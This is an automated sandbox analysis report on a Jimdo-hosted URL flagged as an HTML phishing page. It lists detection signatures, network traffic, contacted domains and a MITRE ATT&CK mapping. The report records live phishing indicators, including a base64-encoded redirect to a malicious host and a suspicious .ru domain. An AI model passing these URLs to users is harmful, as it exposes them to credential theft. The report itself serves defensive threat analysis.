Edit tour

Windows Analysis Report
https://shadowline-hub-uk-limited.jimdosite.com/

Overview

General Information

Sample URL:	https://shadowline-hub-uk-limited.jimdosite.com/
Analysis ID:	1559453

Detection

HTMLPhisher

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish29

AI detected suspicious URL

HTML page contains hidden javascript code

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 3472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1984,i,17090612990334308462,471618744472331267,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 6352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://shadowline-hub-uk-limited.jimdosite.com/" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
1.6.pages.csv	JoeSecurity_HtmlPhish_29	Yara detected HtmlPhish_29	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected HtmlPhish29

Source: Yara match

File source: 1.6.pages.csv, type: HTML

AI detected suspicious URL

Source: Email

Joe Sandbox AI: AI detected IP in URL: https://85.rescindq.com

Source: https://shadowline-hub-uk-limited.jimdosite.com/

HTTP Parser: Base64 decoded: 1732111483.000000

Source: https://lexinvariant.com/#aHR0cHM6Ly84NS5yZXNjaW5kcS5jb20vd3F0eVpBRlp6RjNoWGdzb2dib0tnLw==	HTTP Parser: No favicon
Source: https://85.rescindq.com/wqtyZAFZzF3hXgsogboKg/	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.17:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.17:49717 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 27MB

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108

Source: global traffic	DNS traffic detected: DNS query: shadowline-hub-uk-limited.jimdosite.com
Source: global traffic	DNS traffic detected: DNS query: jimdo-dolphin-static-assets-prod.freetls.fastly.net
Source: global traffic	DNS traffic detected: DNS query: fonts.jimstatic.com
Source: global traffic	DNS traffic detected: DNS query: jimdo-storage.freetls.fastly.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: lexinvariant.com
Source: global traffic	DNS traffic detected: DNS query: 85.rescindq.com
Source: global traffic	DNS traffic detected: DNS query: at.prod.jimdo.systems
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: mslawasq1fdbt4smgovect8av3dfpya4jiqeyxwzdxoaokfqfbwqz289.wceescty.ru
Source: global traffic	DNS traffic detected: DNS query: www.sharepoint.com
Source: global traffic	DNS traffic detected: DNS query: assets.onestore.ms
Source: global traffic	DNS traffic detected: DNS query: ajax.aspnetcdn.com
Source: global traffic	DNS traffic detected: DNS query: c.s-microsoft.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.17:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.17:49717 version: TLS 1.2

Source: classification engine

Classification label: mal52.phis.win@22/35@54/277

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1984,i,17090612990334308462,471618744472331267,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://shadowline-hub-uk-limited.jimdosite.com/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1984,i,17090612990334308462,471618744472331267,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	1 Extra Window Memory Injection	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://shadowline-hub-uk-limited.jimdosite.com/	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
jimdo-dolphin-static-assets-prod.freetls.fastly.net	151.101.2.79	true	false	high
a.nel.cloudflare.com	35.190.80.1	true	false	high
at.prod.jimdo.systems	3.255.10.234	true	false	high
code.jquery.com	151.101.130.137	true	false	high
lexinvariant.com	172.67.190.244	true	false	high
85.rescindq.com	104.21.30.176	true	true	unknown
cdnjs.cloudflare.com	104.17.24.14	true	false	high
jimdo-storage.freetls.fastly.net	151.101.2.79	true	false	high
challenges.cloudflare.com	104.18.95.41	true	false	high
mslawasq1fdbt4smgovect8av3dfpya4jiqeyxwzdxoaokfqfbwqz289.wceescty.ru	172.67.200.84	true	false	unknown
www.google.com	172.217.21.36	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high
assets.onestore.ms	unknown	unknown	false	high
ajax.aspnetcdn.com	unknown	unknown	false	high
c.s-microsoft.com	unknown	unknown	false	high
www.sharepoint.com	unknown	unknown	false	unknown
fonts.jimstatic.com	unknown	unknown	false	unknown
shadowline-hub-uk-limited.jimdosite.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Reputation
https://85.rescindq.com/wqtyZAFZzF3hXgsogboKg/	false	unknown
https://shadowline-hub-uk-limited.jimdosite.com/	false	unknown
https://lexinvariant.com/#aHR0cHM6Ly84NS5yZXNjaW5kcS5jb20vd3F0eVpBRlp6RjNoWGdzb2dib0tnLw==	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
152.199.19.160	unknown	United States	15133	EDGECASTUS	false
172.217.17.46	unknown	United States	15169	GOOGLEUS	false
104.18.94.41	unknown	United States	13335	CLOUDFLARENETUS	false
104.18.41.38	unknown	United States	13335	CLOUDFLARENETUS	false
2.20.41.218	unknown	European Union	16625	AKAMAI-ASUS	false
216.58.208.227	unknown	United States	15169	GOOGLEUS	false
151.101.130.137	code.jquery.com	United States	54113	FASTLYUS	false
2.16.158.32	unknown	European Union	20940	AKAMAI-ASN1EU	false
172.217.21.35	unknown	United States	15169	GOOGLEUS	false
172.217.21.36	www.google.com	United States	15169	GOOGLEUS	false
172.67.190.244	lexinvariant.com	United States	13335	CLOUDFLARENETUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
162.159.128.70	unknown	United States	13335	CLOUDFLARENETUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
23.218.209.163	unknown	United States	6453	AS6453US	false
20.76.201.171	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
172.217.17.78	unknown	United States	15169	GOOGLEUS	false
172.217.17.35	unknown	United States	15169	GOOGLEUS	false
3.255.10.234	at.prod.jimdo.systems	United States	16509	AMAZON-02US	false
104.18.95.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
151.101.2.79	jimdo-dolphin-static-assets-prod.freetls.fastly.net	United States	54113	FASTLYUS	false
184.85.178.180	unknown	United States	20940	AKAMAI-ASN1EU	false
151.101.2.137	unknown	United States	54113	FASTLYUS	false
74.125.205.84	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
151.101.130.79	unknown	United States	54113	FASTLYUS	false
104.21.30.176	85.rescindq.com	United States	13335	CLOUDFLARENETUS	true
172.67.200.84	mslawasq1fdbt4smgovect8av3dfpya4jiqeyxwzdxoaokfqfbwqz289.wceescty.ru	United States	13335	CLOUDFLARENETUS	false
23.32.239.81	unknown	United States	2828	XO-AS15US	false
162.159.129.70	unknown	United States	13335	CLOUDFLARENETUS	false
23.32.239.43	unknown	United States	2828	XO-AS15US	false
104.17.25.14	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.17
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1559453
Start date and time:	2024-11-20 15:03:58 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://shadowline-hub-uk-limited.jimdosite.com/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.phis.win@22/35@54/277

Warnings

Exclude process from analysis (whitelisted): TextInputHost.exe
Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.17.46, 74.125.205.84, 162.159.128.70, 162.159.129.70, 34.104.35.123, 104.18.41.38, 172.64.146.218, 216.58.208.227, 2.16.158.32, 2.16.158.43, 2.16.158.50, 2.16.158.34, 2.16.158.27, 2.16.158.33, 2.16.158.35, 2.16.158.26, 2.16.158.40, 23.32.238.18, 20.109.210.53
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, accounts.google.com, fonts.jimstatic.com.cdn.cloudflare.net, fonts.gstatic.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, www-www.bing.com.trafficmanager.net, clients2.google.com, e86303.dscx.akamaiedge.net, edgedl.me.gvt1.com, www.bing.com.edgekey.net, sls.update.microsoft.com, clients.l.google.com, web.jimdosite.com.cdn.cloudflare.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://shadowline-hub-uk-limited.jimdosite.com/

LLM Input / Output

Input	Output
URL: https://shadowline-hub-uk-limited.jimdosite.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": true, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://shadowline-hub-uk-limited.jimdosite.com
